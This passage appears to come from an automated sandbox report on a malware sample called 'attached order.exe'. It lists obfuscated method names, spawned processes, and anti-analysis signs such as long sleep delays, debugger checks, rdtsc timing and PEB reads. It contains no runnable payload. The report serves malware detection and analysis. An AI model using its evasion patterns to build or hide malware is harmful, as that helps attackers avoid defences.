                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, wLi39cVAXRaCxIGOj0.csHigh entropy of concatenated method names: 'TiPt8tBHwg', 'E53tsFWnDp', 'YTTtIo7c1r', 'EdntAPQxvJ', 'qybtcOwFm3', 'ALVtwjAT2r', 'JOItoUSNNU', 'AMVt544uEg', 'ed3tZZH0HO', 'tjVtgUqYix'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, TPN3d7UDbhgCkcLQUk.csHigh entropy of concatenated method names: 'bmJFBD6kfb', 'ms0F6I4Z78', 'SdJF2tcAe1', 'o9TFd4VS17', 'h7RFHLSb8E', 'pYvFPButgh', 'MB5Fp9V5Hc', 'm4qFj6aDgQ', 'dobFWE09k7', 'wRWFJvXUFj'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, iJdG0BmQPFSP0j3YBo.csHigh entropy of concatenated method names: 'Dispose', 'PuWMO0iSne', 'BkyY61qHms', 'qVqyxfFIiq', 'gM6Mr6rK2j', 'MP6MzIJR6E', 'ProcessDialogKey', 'jeeYKZ3MjL', 'RNSYMwJJsO', 'AITYYbiEuL'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, rYI1hawWmEIHpHHthE.csHigh entropy of concatenated method names: 'SXM7aBMCrs', 'Qew7Qlq9BQ', 'qYp7B9oeot', 'aW576nWYDA', 'KcR7dPoSI3', 'Asq7HFnwKj', 'PGS7pmRMIB', 'VZG7jdwxrx', 'WQw7JtQcOB', 'CLi7VPLoYV'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, eVvt4kqypRIiTj4YV6.csHigh entropy of concatenated method names: 'wZTweCm5HJ', 'E4xwX5U1LS', 'I7RwTB2KQX', 'lN6wbGfoD5', 'corwvancqC', 'gAbwqPCUyv', 'Ja4wQOdPRZ', 'G52wLOsX9n', 'MO84JSrPj01cKQwhiYE', 'GPBaVXrlA0Ft4dXne6d'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, Nl3Yl9bhX5woqS4SNM.csHigh entropy of concatenated method names: 'KFi1JohfIc', 'huE1NEDNN5', 'rTK1kmriGl', 'x0G1GKafes', 'A0d16tGRlT', 'DOH12ewJh1', 'wGY1dyE9iG', 'EG51HLOW74', 'MDW1PgnNZW', 'iwH1pE6EmR'
                      Source: 0.2.attached order.exe.4e69ff8.3.raw.unpack, BKFV9olV89pdWF9owx.csHigh entropy of concatenated method names: 'mgglUhNX0t', 'HnOlr7IHnd', 'qiVEKLjm2w', 'cYtEMDsRp5', 'HB0lV0XU6T', 'w3VlN3kMQ0', 'o34lRvOYGo', 'HyGlkMh0Vq', 'V5alGXsbH4', 'xNOlCbdasP'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, l79wYB7WMJ2cyYK3S5.csHigh entropy of concatenated method names: 'pvgoXenhU6', 'EqRo3wvQOS', 'GEwoTeN2m0', 'jDXob6ffWQ', 'Y4roifhMh8', 'zliov7a7DQ', 'AuWoqxpGNA', 'pcuoamH1jE', 'WHioQLb4Vx', 'em7oL3S8oh'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, nq4p8DrrfiFhR2PyIVo.csHigh entropy of concatenated method names: 'lmmfrHJB4q', 'xA1fze807A', 'zP5hKJJ8Hq', 'hOOhMQBVrF', 'UaKhYVAXsG', 't4Rht4bNg9', 'R74h0Ulalw', 'hnyh8cBmq7', 'HgmhsfVRNx', 'DhEhIohEMY'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, kiIMTrfFNeVMhL8TTa.csHigh entropy of concatenated method names: 'FPtciGKgY4', 'uwjcqjj1y7', 'BaTA28LlKI', 'SpLAd96T7O', 'MBQAHk2Z1P', 'YatAPovX6C', 'bbtApxfJ6d', 'eKsAjrM3fq', 'FlmAWUOTau', 'CVHAJj3tUq'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Yr9UhjPRPHk49KsZse.csHigh entropy of concatenated method names: 'WmNIkEJEn2', 'rIPIGNn2vC', 'gNdIC1OxfP', 'ISbImWnp4F', 'NTUIxlHtIy', 'UToIuqjmwI', 'IyGIneOPmS', 'CIIIUTcxLh', 'LLVIOv2qOb', 'aWyIrpQTNW'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, kLptsSr60HPKa7R7vbZ.csHigh entropy of concatenated method names: 'ToString', 'QSBhaY6R1N', 'QfFhQfRKDo', 'duPhLR7Q1O', 'MuWhBqrjib', 'xumh6Z4ZCF', 'cJuh2dQCcY', 'm8fhd62BeY', 'ptMkRoL6UDDMUYeAth5', 'LdDnDvLruvYPQAdqcLt'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, GnTBRbs4alXFnisyMh.csHigh entropy of concatenated method names: 'b98fAZsDLZ', 'Fb7fcrjjrB', 'hBNfwoJRlH', 'q0pfoqEqiV', 'CuifF7UwQB', 'W3Qf5DL71J', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, itYFVZIe9hkpVHMofY.csHigh entropy of concatenated method names: 'Seqw8KTyg9', 'wGJwIye311', 'ETswceKNwF', 'rdtwo0d3Mt', 'rPNw5unmDi', 'Xj6cxE2IPA', 'REYcuRiqgA', 'C6DcnFpO6e', 'H35cUZTehd', 'iZccOkPpke'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, eRABhcrNQh1PLErMOYj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y8DyFu4HrR', 'YJGyflb2Vj', 'g58yhLRGwC', 'XCIyyEgJrc', 'nViySFbZ2e', 'dgCy9Z1mSt', 'hS4yeae9CO'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, cQmN4b32gbIKZ4x1dS.csHigh entropy of concatenated method names: 'DJHAbcyoR3', 'qRYAvhfbWe', 'wtIAaSorC8', 'AWUAQTwRIH', 'Fq7A1BNvno', 'r18ADf5rMo', 'NiXAl1qLuX', 'iQcAEwOW1T', 'Ho6AFo0NEW', 'bUXAfSBKsr'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, gfskp8Q84So3K9tiKr.csHigh entropy of concatenated method names: 'oqmoswUdaK', 'QQSoAAp7nb', 'UkFowfpaYN', 'DL2wrPbg8b', 'm4Bwzjr8rP', 'dPvoKf3vwN', 'iSjoMp8hbt', 'ji0oYRb74t', 'RslotkMfJk', 'NKMo0Iqhy3'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, s8HNx2AxO9TnfXUWQd.csHigh entropy of concatenated method names: 'Bc3wLwrUa4xrOqpUmEP', 'c3mOOMrhIJYLCoOtbx2', 'lLtpvir2H37k5SJmhXL', 'SGcwEkCHm9', 'QcHwFyAUpx', 'Tnrwf4dT1X', 'QllN7Tr0buwPgGdlIWP', 'BUhh12rIxlZnyXgHgu8'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, YmlVkdiyjWDJPWx8hw.csHigh entropy of concatenated method names: 'Kc5F1d6u2P', 'gfhFlXZYTw', 'bKmFFuT2Mi', 'mB7FhQJYSf', 'uVaFSEKtWm', 'mGrFegvV9T', 'Dispose', 'qkhEsNgaN7', 'ctBEIptCKQ', 'n2kEAYIIdj'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, eTLVDTKsInEqj6ZJVp.csHigh entropy of concatenated method names: 'QgDlgjp2yu', 'HJ2l4n9COW', 'ToString', 'ErplsveGcJ', 'hS1lIN7DEg', 'rhulAYiITn', 'nJClc4KFxZ', 'FdIlwnlkcf', 'oURlobXjfr', 'ajnl5AlO1T'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, n33M3uz3ORD1UdBYlt.csHigh entropy of concatenated method names: 'yhXfvgH9Ws', 'NiefaHeHlH', 'ggHfQ9EU1s', 'ewcfBqZ045', 'pOof60l7ES', 'xJQfdnZR1D', 'hXxfHaBvhZ', 'n02fe3hIU8', 'n3hfXZhrfp', 'intf3Wmljq'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, EgP0XVNcRfQGNejquO.csHigh entropy of concatenated method names: 'aMLMoyQ3Ek', 'LyMM5lVUe8', 'boaMgVua79', 'fotM47u3Ye', 'z3cM1f0Zcy', 'qT3MDucRFr', 'ARTbvkMc6KNFI5I7C4', 'K1D1tUKcpeii4Q7rx4', 'BscMMcKMgP', 'DIdMtlxfsY'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, WcniDe88ARxPuNbytN.csHigh entropy of concatenated method names: 'ToString', 'mH4DVBYc97', 'J67D6XaQra', 'aweD2W48ye', 'zFrDd23Bud', 'RFcDHlML0s', 'IYcDPbicSt', 'aoLDpoTdw7', 'FxXDjjQtsc', 'FoSDW1Qnr6'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Rpq2Lh6LQL1dHucNxX.csHigh entropy of concatenated method names: 'm7TTiK7tM', 'VHibv4SUk', 'HE5vp148q', 'YVVqfcUKn', 'IYRQ4VAXm', 'LaQL1bfvw', 'p3u9o4ogGhsFFWSnpA', 'CBcLcrX1At8i9Ajp8V', 'FLDEJhytJ', 'pMDfhOsim'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, QdlGFmrkGBZ5RgQMJfR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yD1fVnCA6l', 'DP0fNkEoC5', 'w7DfRBGDaS', 'JDtfkYnGmU', 'UuhfGW7Tyi', 'Nq1fC7nsM7', 'JXifm2WJph'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, wLi39cVAXRaCxIGOj0.csHigh entropy of concatenated method names: 'TiPt8tBHwg', 'E53tsFWnDp', 'YTTtIo7c1r', 'EdntAPQxvJ', 'qybtcOwFm3', 'ALVtwjAT2r', 'JOItoUSNNU', 'AMVt544uEg', 'ed3tZZH0HO', 'tjVtgUqYix'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, TPN3d7UDbhgCkcLQUk.csHigh entropy of concatenated method names: 'bmJFBD6kfb', 'ms0F6I4Z78', 'SdJF2tcAe1', 'o9TFd4VS17', 'h7RFHLSb8E', 'pYvFPButgh', 'MB5Fp9V5Hc', 'm4qFj6aDgQ', 'dobFWE09k7', 'wRWFJvXUFj'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, iJdG0BmQPFSP0j3YBo.csHigh entropy of concatenated method names: 'Dispose', 'PuWMO0iSne', 'BkyY61qHms', 'qVqyxfFIiq', 'gM6Mr6rK2j', 'MP6MzIJR6E', 'ProcessDialogKey', 'jeeYKZ3MjL', 'RNSYMwJJsO', 'AITYYbiEuL'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, rYI1hawWmEIHpHHthE.csHigh entropy of concatenated method names: 'SXM7aBMCrs', 'Qew7Qlq9BQ', 'qYp7B9oeot', 'aW576nWYDA', 'KcR7dPoSI3', 'Asq7HFnwKj', 'PGS7pmRMIB', 'VZG7jdwxrx', 'WQw7JtQcOB', 'CLi7VPLoYV'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, eVvt4kqypRIiTj4YV6.csHigh entropy of concatenated method names: 'wZTweCm5HJ', 'E4xwX5U1LS', 'I7RwTB2KQX', 'lN6wbGfoD5', 'corwvancqC', 'gAbwqPCUyv', 'Ja4wQOdPRZ', 'G52wLOsX9n', 'MO84JSrPj01cKQwhiYE', 'GPBaVXrlA0Ft4dXne6d'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, Nl3Yl9bhX5woqS4SNM.csHigh entropy of concatenated method names: 'KFi1JohfIc', 'huE1NEDNN5', 'rTK1kmriGl', 'x0G1GKafes', 'A0d16tGRlT', 'DOH12ewJh1', 'wGY1dyE9iG', 'EG51HLOW74', 'MDW1PgnNZW', 'iwH1pE6EmR'
                      Source: 0.2.attached order.exe.4ef5218.2.raw.unpack, BKFV9olV89pdWF9owx.csHigh entropy of concatenated method names: 'mgglUhNX0t', 'HnOlr7IHnd', 'qiVEKLjm2w', 'cYtEMDsRp5', 'HB0lV0XU6T', 'w3VlN3kMQ0', 'o34lRvOYGo', 'HyGlkMh0Vq', 'V5alGXsbH4', 'xNOlCbdasP'
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                      Source: C:\Users\user\Desktop\attached order.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cacls.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: attached order.exe PID: 7972, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\attached order.exe, API/Special instruction interceptor: Address: 7FF82C0CD144
                      Source: C:\Users\user\Desktop\attached order.exe, API/Special instruction interceptor: Address: 7FF82C0D0594
                      Source: C:\Users\user\Desktop\attached order.exe, API/Special instruction interceptor: Address: 7FF82C0CFF74
                      Source: C:\Users\user\Desktop\attached order.exe, API/Special instruction interceptor: Address: 7FF82C0CD6C4
                      Source: C:\Users\user\Desktop\attached order.exe, API/Special instruction interceptor: Address: 7FF82C0CD864
                      Source: C:\Users\user\Desktop\attached order.exe, API/Special instruction interceptor: Address: 7FF82C0CD004
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD144
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0D0594
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD764
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD324
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD364
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD004
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CFF74
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD6C4
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD864
                      Source: C:\Windows\SysWOW64\cacls.exe, API/Special instruction interceptor: Address: 7FF82C0CD604
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: 1AB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: 33D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: 53D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: 5B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: 6B70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: 6CA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: 7CA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: BA80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: CA80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: CF10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Memory allocated: DF10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_0177088E rdtsc 3_2_0177088E
                      Source: C:\Users\user\Desktop\attached order.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\cacls.exe, Window / User API: threadDelayed 9852
                      Source: C:\Users\user\Desktop\attached order.exe, API coverage: 0.9 %
                      Source: C:\Windows\SysWOW64\cacls.exe, API coverage: 2.3 %
                      Source: C:\Users\user\Desktop\attached order.exe TID: 1264, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 7284, Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264, Thread sleep count: 121 > 30
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264, Thread sleep time: -242000s >= -30000s
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264, Thread sleep count: 9852 > 30
                      Source: C:\Windows\SysWOW64\cacls.exe TID: 7264, Thread sleep time: -19704000s >= -30000s
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\cacls.exe, Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\cacls.exe, Code function: 5_2_0067C940 FindFirstFileW,FindNextFileW,FindClose,5_2_0067C940
                      Source: C:\Users\user\Desktop\attached order.exe, Thread delayed: delay time: 922337203685477
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000036F1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: YwQDqEmu
                      Source: attached order.exe, 00000000.00000002.16557711789.00000000036F1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: YwQDqEmurjFGBKNvIy0||0||0||0||0||||||0||0||0||0||||||||||||||0||0||0||0||0||0||0||0||4.0||2||15769||0||0||||||0||0||1||2||0||x86||0||.exe||
                      Source: RAVCpl64.exe, 00000004.00000002.17793357881.000000000053A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_`
                      Source: cacls.exe, 00000005.00000002.17793373650.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.17170759915.00000151460A6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\attached order.exe, Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\attached order.exe, Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\cacls.exe, Process queried: DebugPort
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_0177088E rdtsc 3_2_0177088E
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_00417E43 LdrLoadDll,3_2_00417E43
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_01736179 mov eax, dword ptr fs:[00000030h] 3_2_01736179
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_0176415F mov eax, dword ptr fs:[00000030h] 3_2_0176415F
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_0172A147 mov eax, dword ptr fs:[00000030h] 3_2_0172A147
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_017BA130 mov eax, dword ptr fs:[00000030h] 3_2_017BA130
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_01760118 mov eax, dword ptr fs:[00000030h] 3_2_01760118
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_017401F1 mov eax, dword ptr fs:[00000030h] 3_2_017401F1
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_0173A1E3 mov eax, dword ptr fs:[00000030h] 3_2_0173A1E3
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_017F81EE mov eax, dword ptr fs:[00000030h] 3_2_017F81EE
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_017281EB mov eax, dword ptr fs:[00000030h] 3_2_017281EB
                      Source: C:\Users\user\Desktop\attached order.exe, Code function: 3_2_017401C0 mov eax, dword ptr fs:[00000030h] 3_2_017401C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017641BB mov ecx, dword ptr fs:[00000030h]3_2_017641BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017641BB mov eax, dword ptr fs:[00000030h]3_2_017641BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017641BB mov eax, dword ptr fs:[00000030h]3_2_017641BB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E1A4 mov eax, dword ptr fs:[00000030h]3_2_0176E1A4
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E1A4 mov eax, dword ptr fs:[00000030h]3_2_0176E1A4
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734180 mov eax, dword ptr fs:[00000030h]3_2_01734180
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734180 mov eax, dword ptr fs:[00000030h]3_2_01734180
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01734180 mov eax, dword ptr fs:[00000030h]3_2_01734180
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804080 mov eax, dword ptr fs:[00000030h]3_2_01804080
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736074 mov eax, dword ptr fs:[00000030h]3_2_01736074
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01736074 mov eax, dword ptr fs:[00000030h]3_2_01736074
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01760044 mov eax, dword ptr fs:[00000030h]3_2_01760044
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B6040 mov eax, dword ptr fs:[00000030h]3_2_017B6040
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01772010 mov ecx, dword ptr fs:[00000030h]3_2_01772010
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738009 mov eax, dword ptr fs:[00000030h]3_2_01738009
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C0F6 mov eax, dword ptr fs:[00000030h]3_2_0172C0F6
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BC0E0 mov ecx, dword ptr fs:[00000030h]3_2_017BC0E0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017700A5 mov eax, dword ptr fs:[00000030h]3_2_017700A5
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B60A0 mov eax, dword ptr fs:[00000030h]3_2_017B60A0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172A093 mov ecx, dword ptr fs:[00000030h]3_2_0172A093
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C090 mov eax, dword ptr fs:[00000030h]3_2_0172C090
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017C6090 mov eax, dword ptr fs:[00000030h]3_2_017C6090
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AE372 mov eax, dword ptr fs:[00000030h]3_2_017AE372
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0371 mov eax, dword ptr fs:[00000030h]3_2_017B0371
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B0371 mov eax, dword ptr fs:[00000030h]3_2_017B0371
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175237A mov eax, dword ptr fs:[00000030h]3_2_0175237A
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176E363 mov eax, dword ptr fs:[00000030h]3_2_0176E363
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176A350 mov eax, dword ptr fs:[00000030h]3_2_0176A350
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728347 mov eax, dword ptr fs:[00000030h]3_2_01728347
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728347 mov eax, dword ptr fs:[00000030h]3_2_01728347
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728347 mov eax, dword ptr fs:[00000030h]3_2_01728347
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768322 mov eax, dword ptr fs:[00000030h]3_2_01768322
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768322 mov eax, dword ptr fs:[00000030h]3_2_01768322
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01768322 mov eax, dword ptr fs:[00000030h]3_2_01768322
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E328 mov eax, dword ptr fs:[00000030h]3_2_0172E328
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E328 mov eax, dword ptr fs:[00000030h]3_2_0172E328
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E328 mov eax, dword ptr fs:[00000030h]3_2_0172E328
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E310 mov eax, dword ptr fs:[00000030h]3_2_0174E310
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E310 mov eax, dword ptr fs:[00000030h]3_2_0174E310
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174E310 mov eax, dword ptr fs:[00000030h]3_2_0174E310
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0176631F mov eax, dword ptr fs:[00000030h]3_2_0176631F
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017643D0 mov ecx, dword ptr fs:[00000030h]3_2_017643D0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017BE3DD mov eax, dword ptr fs:[00000030h]3_2_017BE3DD
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017B43D5 mov eax, dword ptr fs:[00000030h]3_2_017B43D5
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E3C0 mov eax, dword ptr fs:[00000030h]3_2_0172E3C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E3C0 mov eax, dword ptr fs:[00000030h]3_2_0172E3C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172E3C0 mov eax, dword ptr fs:[00000030h]3_2_0172E3C0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172C3C7 mov eax, dword ptr fs:[00000030h]3_2_0172C3C7
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017363CB mov eax, dword ptr fs:[00000030h]3_2_017363CB
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_017AC3B0 mov eax, dword ptr fs:[00000030h]3_2_017AC3B0
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175A390 mov eax, dword ptr fs:[00000030h]3_2_0175A390
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175A390 mov eax, dword ptr fs:[00000030h]3_2_0175A390
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0175A390 mov eax, dword ptr fs:[00000030h]3_2_0175A390
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01750230 mov ecx, dword ptr fs:[00000030h]3_2_01750230
